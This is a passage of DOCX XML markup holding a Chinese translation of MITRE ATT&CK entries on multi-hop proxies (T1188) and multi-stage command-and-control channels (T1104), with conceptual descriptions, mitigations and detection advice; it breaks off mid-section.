        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="3966F47B" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7561D1" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1188</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253658BB" w14:textId="6509B9EA" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F6D48D" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0844FE2B" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>协议分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D75C09" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F2A9C0" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DBDE255" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A0B3F1" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了掩盖恶意流量的来源，攻击者可能会将多个代理链接在一起。通常，防御程序能够识别最后一个穿过它进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>其网络的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理通信流量；防御程序可能能够或无法识别最后一跳代理之前的任何其它代理。这种技术要求防御程序跟踪多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>代理</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意流量来识别其来源，使得识别恶意流量的来源更加困难。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823EEF5" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3110"/>
        <w:gridCol w:w="6626"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00BC3074" w14:paraId="52A2C9C8" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3110" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6592EEA4" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="50D9E7EA" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="05498032" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A23EC53" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId242" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络流量过滤</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2E10DB" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可使用网络黑名单和白名单来阻止流量进入已知匿名网络和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基础设施。值得注意的是，有些</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术如域名前置可能</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能够规避</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>此措施</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FC7C172" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5536F6" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06137B21" w14:textId="4DDA9D30" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察多跳代理的使用时，可找出来自实际</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的网络数据与入流和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>出流之间的关系从而追溯到恶意流量的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>向使用此技术的已知匿名网络（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>已知攻击者基础设施发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>流量警报来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多跳代理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4E977" w14:textId="0E10DF6D" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多</w:t>
      </w:r>
      <w:r w:rsidR="00BE4438">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>段信道</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="5A1F2CF8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="443D5378" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E728DB" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E728DB">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:t xml:space="preserve"> T1104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB8093E" w14:textId="2218530A" w:rsidR="00A0413E" w:rsidRPr="00E728DB" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524789E1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E728DB" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E728DB">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D816E68" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E728DB" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E728DB">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，网络设备日志，网络协议分析，网络抓包，进程使用网络</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09755451" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E728DB" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7530544E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E728DB">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="790D1103" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005C59F6" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0552A804" w14:textId="76E9DE38" w:rsidR="00A0413E" w:rsidRPr="00373275" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以创建用于在不同条件下或用于某些功能的</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的多个阶段。</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用多个阶段可能会混淆</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道，使检测更加困难。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0441BF" w14:textId="65D4134B" w:rsidR="00A0413E" w:rsidRPr="00373275" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程访问工具将回调第一阶段</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器以获取指令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一阶段可能具有自动化功能，可收集基本主机信息，更新工具和上载其他文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时可以上载第二个远程访问工具（</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），以将主机重定向到第二阶段</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二阶段可能会更加全面，并允许对手通过反向外壳和其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能与系统进行交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715B213D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同的阶段可能会单独托管，没有重叠的基础设施。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一阶段通信路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现和阻止，加载器还可以具有备用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一级回调或回退信道。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50170DBB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="6284DF2E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1F76A06B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="24F4E86A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00242E26" w14:paraId="0BAB74C5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E72DC27" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="377481FC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名来识别特定恶意软件的流量的网络入侵检测和防御系统可用于缓解网络级别的活动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAB6356" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00373275" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090EB5CF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14617854" w14:textId="3A5111D1" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
